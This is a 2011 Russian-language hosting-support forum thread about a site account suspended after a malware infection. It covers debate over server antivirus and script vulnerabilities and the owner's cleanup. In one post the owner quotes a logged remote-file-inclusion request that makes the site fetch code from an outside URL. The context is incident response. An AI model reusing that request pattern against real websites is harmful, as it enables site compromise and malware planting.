|
Опять This Account Has Been Suspended на www.teplota.org.ua
|
| Автор |
Сообщение |
[LP]LordPro.teus
Призрак Лорда
Зарегистрирован: 26.07.2007
Сообщения: 5092
42282 
|
 Добавлено: Ср, 21 Сен, 2011 17:04 Заголовок сообщения: |
 |
|
vohomov
Google: эвристический анализ
Не стоит писать о чем-то, не зная тему хоть на среднем уровне.
_________________
 
До выхода LiteDiary 0.3.0: парам-пам-пам-пам! Она уже здесь! |
|
| Вернуться к началу |
|
 |
Flointer
Хостинг — это наше всё!
Зарегистрирован: 20.06.2007
Сообщения: 165
Откуда: UA Харьков
10765
|
| Добавлено: Ср, 21 Сен, 2011 20:10 Заголовок сообщения: |
|
|
| eomysupport писал(а): | | Я хотел бы уточнить, что в данной атаке не участвовали какие-либо пароли. Т.е., атака была произведена через дыру в скриптах. |
Думаю пароли врядли были уведены. Скрипты какие смогу - обновлю (форум phpBB). Основной сайт - собан из кусков HTML кода с помощью PHP, да использован CSS. Там ничего вобщем то военного. В качестве визуальной оболочки для админки - Strawberry 1.1.1.
Искать дыры - в самих скриптах - равносильно искть иголку в стоге сена. Даже в том же WordPress и DLE находят все новые и новые дырки.
Хотелось бы чтоб антивирусной политике больше внимания уделялось на самом сервере (просто не малейшего понятия есть ли на сервере антивирусное програмное обеспечение или что либо подобное).
| vohomov писал(а): | | Есть примеры сайтов, работающих "на чистом" HTML - люди не знают PHP (или не желают его использовать) и не имеют проблем. |
Есть живой пример - сайт на читом HTML был заражен. Вирус заменил index .html на подобный index.php только со своими внедрениями кода. Нет панацеи!
Вобщем 2 риторических вопроса таки остались "Что делать?" и "Как быть дальше с возникшей ситуацией?"
P.S. Решил еще проверить систему "CureIt!" от "DrWEB, чтоб ничего не снилось...
_________________
www.teplota.org.ua - всё для теплотехника |
|
| Вернуться к началу |
|
|
Алзим
Владелец сайта на хостинге EOMY
Зарегистрирован: 17.10.2010
Сообщения: 1591
12617
|
| Добавлено: Ср, 21 Сен, 2011 20:25 Заголовок сообщения: |
|
|
| Flointer писал(а): | | Хотелось бы чтоб антивирусной политике больше внимания уделялось на самом сервере (просто не малейшего понятия есть ли на сервере антивирусное программное обеспечение или что либо подобное). |
А если нет антивирусного ПО на сервере?
Я вроде бы слышал, что на Линуксах антивири не ставят, т.к. там и так всё запарено так, что появиться вирусу достаточно сложно.
_________________
 |
|
| Вернуться к началу |
|
|
Flointer
Хостинг — это наше всё!
Зарегистрирован: 20.06.2007
Сообщения: 165
Откуда: UA Харьков
10765
|
| Добавлено: Чт, 22 Сен, 2011 02:44 Заголовок сообщения: |
|
|
"CureIt!" от "DrWEB проверено - нет вирусов!!!! Ребята, давайте заканчивать антивирусную баталию, удалять вирус который сидит в акккаунте и что то решать дальше..
_________________
www.teplota.org.ua - всё для теплотехника |
|
| Вернуться к началу |
|
|
vohomov
Хостинг — это наше всё!
Зарегистрирован: 17.07.2009
Сообщения: 183
20631
|
| Добавлено: Чт, 22 Сен, 2011 14:10 Заголовок сообщения: |
|
|
| Flointer писал(а): | | Есть живой пример - сайт на читом HTML был заражен. Вирус заменил index .html на подобный index.php только со своими внедрениями кода. Нет панацеи! |
Это значит, что там был именно перехват пароля. Сервер там был ни при чём. Скриптов нет - не может быть и уязвимостей. Это - факт. Проблемы с дефейсом и вставкой постороннего кода возникают именно на сайтах с "дырявыми" скриптами. Погуглите на эту тему, много нового узнаете.
| Алзим писал(а): | | Flointer писал(а): | | Хотелось бы чтоб антивирусной политике больше внимания уделялось на самом сервере (просто не малейшего понятия есть ли на сервере антивирусное программное обеспечение или что либо подобное). |
А если нет антивирусного ПО на сервере?
Я вроде бы слышал, что на Линуксах антивири не ставят, т.к. там и так всё запарено так, что появиться вирусу достаточно сложно. |
Именно так. Возможны только руткиты, но если бы действительно какой-нибудь руткит завёлся, то проблемы были бы если не на всех, то на многих аккаунтах.
Так что сервер здесь ни при чём. Есть, конечно, такая вещь как clamav, но он применяется обычно на файловых хостингах, и то, не для того, чтобы защищать систему, на которой работает хостинг, а для того, чтобы находить и удалять заражённые файлы, загруженные пользователями - то есть чтобы препятствовать распространению вирусов другим пользователям, которые качают с сервера.
| Flointer писал(а): | | Вобщем 2 риторических вопроса таки остались "Что делать?" и "Как быть дальше с возникшей ситуацией?" |
Берём любимый текстовый редактор, и глазками, глазками просматриваем исходные коды страниц. Ручками удаляем вредоносные фрагменты кода.
_________________
Любителям и знатокам географии | Помощь по химии онлайн |
|
| Вернуться к началу |
|
|
Flointer
Хостинг — это наше всё!
Зарегистрирован: 20.06.2007
Сообщения: 165
Откуда: UA Харьков
10765
|
| Добавлено: Вс, 25 Сен, 2011 10:34 Заголовок сообщения: |
|
|
С проблемой разобрался! Проанализировал логи (спасибо друзьям!). Вирус лез через дырку в скрипте по ссылкам вида GET /?page=reklama/?page=http://voip-pilot.com/tutorial/contrib/patches/myid.jpg?
Дырку залатал. Все страницы теперь будут с ЧПУ. Существующие страницы с дырками сделал как статические (перенес в саму CMS? а были как отдельные html которые подгружжались в шаблон). Вирусняки поудалял. На хостинг залью полностью почищенный сайт.
Уважаемая Администрация! Прошу дать доступ к серверу!
_________________
www.teplota.org.ua - всё для теплотехника |
|
| Вернуться к началу |
|
|
vohomov
Хостинг — это наше всё!
Зарегистрирован: 17.07.2009
Сообщения: 183
20631
|
| Добавлено: Вс, 25 Сен, 2011 11:44 Заголовок сообщения: |
|
|
"Что и требовалось найти."
Вот видите, ларчик просто открывался. Вся проблема в дырявых скриптах.
Главное - почаще проверять всё вручную.
_________________
Любителям и знатокам географии | Помощь по химии онлайн |
|
| Вернуться к началу |
|
|
Flointer
Хостинг — это наше всё!
Зарегистрирован: 20.06.2007
Сообщения: 165
Откуда: UA Харьков
10765
|
| Добавлено: Вс, 25 Сен, 2011 19:21 Заголовок сообщения: |
|
|
Жду чтоб Администрация дала доступ...
_________________
www.teplota.org.ua - всё для теплотехника |
|
| Вернуться к началу |
|
|
Flointer
Хостинг — это наше всё!
Зарегистрирован: 20.06.2007
Сообщения: 165
Откуда: UA Харьков
10765
|
| Добавлено: Пн, 26 Сен, 2011 15:57 Заголовок сообщения: |
|
|
Техподдержка, ну где же Вы? Жду целый день чтоб начать работы...
_________________
www.teplota.org.ua - всё для теплотехника |
|
| Вернуться к началу |
|
|
Алзим
Владелец сайта на хостинге EOMY
Зарегистрирован: 17.10.2010
Сообщения: 1591
12617
|
| Добавлено: Пн, 26 Сен, 2011 17:18 Заголовок сообщения: |
|
|
| Flointer писал(а): | | Техподдержка, ну где же Вы? Жду целый день чтоб начать работы... |
Я уже почти неделю жду. Нет Дмитрия. Занят, наверно, или отлучился.
_________________
|
|
| Вернуться к началу |
|
|
eomysupport
Администратор
Зарегистрирован: 25.12.2005
Сообщения: 5086
66502
|
| Добавлено: Пн, 26 Сен, 2011 22:20 Заголовок сообщения: |
|
|
Здравствуйте,
Прошу прощения за задержку; почему-то мне перестали приходить уведомления об ответах (сейчас разбираюсь).
Я разблокировал аккаунт.
Спасибо.
Алзим
Что-то не вижу от вас писем или личных сообщений; пожалуйста, уточните, что вы имеете в виду?
_________________
Дмитрий
● Техническая поддержка бесплатного хостинга осуществляется только через форум поддержки
● Часто задаваемые вопросы по хостингу
● Условия предоставления услуг бесплатного хостинга |
|
| Вернуться к началу |
|
|
Алзим
Владелец сайта на хостинге EOMY
Зарегистрирован: 17.10.2010
Сообщения: 1591
12617
|
| Добавлено: Пн, 26 Сен, 2011 22:43 Заголовок сообщения: |
|
|
eomysupport
Я не в письме писал, а в теме http://www.eomy.net/forum/spam-s-moego-domena-vt4806.html
Я не могу понять, почему письма с моего домена не приходят на мой же ящик. Яндекс грешит на Вас, утверждая, что у сервера неправильные настройки.
Более подробно, написано в той теме, ссылка на которую выше.
_________________
|
|
| Вернуться к началу |
|
|
eomysupport
Администратор
Зарегистрирован: 25.12.2005
Сообщения: 5086
66502
|
| Добавлено: Вт, 27 Сен, 2011 00:37 Заголовок сообщения: |
|
|
Алзим
Я отписался от той темы как только стало понятно, что с нашей стороны проблем нет. Позднее вы сообщили в той же теме о другой проблеме.
В ответе сотрудника Яндекса нигде нет ни слова про "неправильные" настройки  . Вы можете указать "нелокальность" почтового сервера в настройках MX записи в вашей панели управления cPanel.
Спасибо.
_________________
Дмитрий
● Техническая поддержка бесплатного хостинга осуществляется только через форум поддержки
● Часто задаваемые вопросы по хостингу
● Условия предоставления услуг бесплатного хостинга |
|
| Вернуться к началу |
|
|
Алзим
Владелец сайта на хостинге EOMY
Зарегистрирован: 17.10.2010
Сообщения: 1591
12617
|
| Добавлено: Вт, 27 Сен, 2011 00:59 Заголовок сообщения: |
|
|
| eomysupport писал(а): | Вы можете указать "нелокальность" почтового сервера в настройках MX записи в вашей панели управления cPanel.
|
Установил в настройках "Удаленный Mail Exchanger" и всё заработало.
СПАСИБО! 
_________________
|
|
| Вернуться к началу |
|
|
Flointer
Хостинг — это наше всё!
Зарегистрирован: 20.06.2007
Сообщения: 165
Откуда: UA Харьков
10765
|
| Добавлено: Вт, 27 Сен, 2011 13:20 Заголовок сообщения: |
|
|
Спасибо что разблокировали, как только доберусь до дома - будем ремонтироваться!
_________________
www.teplota.org.ua - всё для теплотехника |
|
| Вернуться к началу |
|
|
|
FAQ
Поиск
Пользователи
Группы
Регистрация
Профиль
Войти и проверить личные сообщения
Вход
